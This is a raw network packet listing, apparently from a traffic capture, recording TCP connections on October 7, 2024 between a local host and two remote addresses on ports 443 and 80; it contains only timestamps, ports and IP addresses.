                                                                                                                                      Oct 7, 2024 03:23:38.385685921 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.385699987 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.388187885 CEST61157443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.388219118 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.388402939 CEST61157443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.388537884 CEST61157443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.388554096 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.389302015 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.389317989 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.389439106 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.389460087 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.389492989 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.389652014 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.389652014 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.389686108 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.389710903 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.391886950 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.391896009 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.391968012 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.392108917 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.392119884 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.452744007 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.452887058 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.452953100 CEST61155443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.453001022 CEST61155443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.453001976 CEST61155443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.453028917 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.453049898 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.455528975 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.455562115 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.455650091 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.455780983 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.455909014 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.455952883 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.455965996 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.455977917 CEST61154443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.456089020 CEST61154443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.456089973 CEST61154443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.456130981 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.456157923 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.458046913 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.458131075 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.458213091 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.458357096 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.458386898 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.610842943 CEST6114580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:38.611001968 CEST6116180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:38.615833044 CEST8061161185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.615915060 CEST6116180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:38.615997076 CEST8061145185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.616050005 CEST6116180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:38.616074085 CEST6114580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:38.620842934 CEST8061161185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.954623938 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.955128908 CEST61156443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.955163002 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.955826998 CEST61156443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.955835104 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.023092031 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.024610996 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.076925039 CEST61157443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.076955080 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.077332020 CEST61157443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.077339888 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.077686071 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.077702999 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.078128099 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.078135014 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.132834911 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.132944107 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.135457039 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.135482073 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.141060114 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.141067028 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.144079924 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.144139051 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.146944046 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.146960974 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.156625986 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.156790018 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.156863928 CEST61156443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.158437014 CEST61156443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.158453941 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.158467054 CEST61156443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.158473969 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.172138929 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.172203064 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.172276020 CEST61157443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.173052073 CEST61157443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.173072100 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.173085928 CEST61157443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.173094034 CEST4436115713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.173098087 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.173120022 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.173156977 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.173182964 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.173213005 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.184278965 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.184286118 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.184319019 CEST61158443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.184324980 CEST4436115813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.233647108 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.233683109 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.233875990 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.234689951 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.234714031 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.234788895 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.234896898 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.234920025 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.240338087 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.240392923 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.240458012 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.240472078 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.240792990 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.240853071 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.240942955 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.240952969 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.240976095 CEST61159443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.240982056 CEST4436115913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.244898081 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.244915009 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.244971991 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.245210886 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.245223045 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.245460033 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.245486975 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.248684883 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.248714924 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.248773098 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.248956919 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.248970985 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.310273886 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.310329914 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.310369968 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.310399055 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.310436964 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.310472965 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.310496092 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.315959930 CEST8061161185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.316037893 CEST6116180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:39.396028042 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.396156073 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.396173000 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.396250010 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.396250010 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.396250010 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.396301985 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.399995089 CEST61166443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.400036097 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.400098085 CEST61166443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.400312901 CEST61166443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.400326967 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.703176975 CEST61160443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.703228951 CEST4436116013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.875902891 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.876023054 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.878631115 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.878640890 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.879307032 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.879312038 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.879714012 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.879733086 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.880132914 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.880145073 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.907290936 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.910569906 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.910593987 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.910991907 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.911000013 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.912746906 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.913044930 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.913070917 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.913471937 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.913476944 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.977777958 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.977828026 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.977893114 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.977905989 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.977963924 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.978013992 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.979406118 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.979422092 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.979476929 CEST61162443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.979485989 CEST4436116213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.982182026 CEST61167443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.982199907 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.982269049 CEST61167443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.982429028 CEST61167443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.982439041 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.985130072 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.985162973 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.985188007 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.985219002 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.985248089 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:39.985315084 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:39.985315084 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.012413979 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.012455940 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.012512922 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.012541056 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.012557030 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.012649059 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.012655020 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.012665033 CEST61164443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.012669086 CEST4436116413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.015125990 CEST61168443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.015155077 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.015237093 CEST61168443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.015373945 CEST61168443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.015396118 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.018807888 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.018865108 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.018928051 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.018944025 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.019059896 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.019099951 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.019099951 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.019120932 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.019134998 CEST61165443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.019140005 CEST4436116513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.021126986 CEST61169443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.021171093 CEST4436116913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.021239042 CEST61169443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.021377087 CEST61169443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.021434069 CEST4436116913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.067616940 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.067624092 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.067661047 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.067711115 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.067842007 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.067842007 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.068022013 CEST61166443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.068038940 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.068178892 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.068178892 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.068178892 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.068451881 CEST61166443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.068455935 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.070214987 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.070231915 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.070293903 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.070405960 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.070416927 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.169711113 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.169847012 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.170032024 CEST61166443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.170062065 CEST61166443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.170077085 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.170088053 CEST61166443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.170093060 CEST4436116613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.172434092 CEST61171443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.172457933 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.172518015 CEST61171443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.172633886 CEST61171443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.172640085 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.375195026 CEST61163443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.375257969 CEST4436116313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.629952908 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.630399942 CEST61167443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.630417109 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.630857944 CEST61167443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.630866051 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.661307096 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.661766052 CEST61168443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.661784887 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.662321091 CEST61168443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.662348986 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.666433096 CEST4436116913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.668989897 CEST61169443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.669008970 CEST4436116913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.669401884 CEST61169443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.669405937 CEST4436116913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.716167927 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.716967106 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.716976881 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.717344046 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.717348099 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.728714943 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.728857040 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.728944063 CEST61167443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.729109049 CEST61167443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.729120970 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.729130030 CEST61167443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.729132891 CEST4436116713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.731539965 CEST61172443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.731622934 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.731719017 CEST61172443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.731848955 CEST61172443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.731869936 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.761177063 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.761321068 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.761399984 CEST61168443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.761543036 CEST61168443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.761559010 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.761571884 CEST61168443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.761578083 CEST4436116813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.763567924 CEST61173443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.763617992 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.763708115 CEST61173443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.763828039 CEST61173443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.763850927 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.769171000 CEST4436116913.107.246.45192.168.2.4
